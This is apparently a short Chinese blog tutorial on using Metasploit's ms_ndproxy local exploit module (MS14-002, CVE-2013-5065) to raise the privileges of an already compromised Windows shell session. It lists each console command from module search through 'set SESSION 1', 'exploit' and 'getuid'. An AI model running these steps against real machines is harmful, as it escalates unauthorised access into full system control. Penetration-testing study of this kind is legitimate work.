Metasploit之NDProxy内核提权
参考视频:http://open.freebuf.com/inland/459.html
使用这个权限提升模块来提升当前已经获得的shell的权限
所以首先得需要一个shell的会话,即session会话
使用模块“exploit/windows/local/ms_ndproxy”来提升权限的
该漏洞的利用是基于ms14-002,Microsoft Windows NDProxy.sys,CVE-2013-5065
search 14-002 -->搜索这个漏洞的相关模块
得到下面两个
exploit/windows/local/bthpan -->微软蓝牙个人区域网络(bthpan。sys)特权升级
exploit/windows/local/ms_ndproxy -->微软的,即Windows的漏洞利用模块
use exploit/windows/local/ms_ndproxy -->使用这个模块
show options -->查看配置选项
我们可以看到只需要配置一个会话选项SESSION,那么我们只要把需要提升权限的会话set进去即可
set SESSION 1 -->设置会话1来进行权限提升
exploit -->执行攻击,提升权限
getuid -->查看当前权限,提权后可查看
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论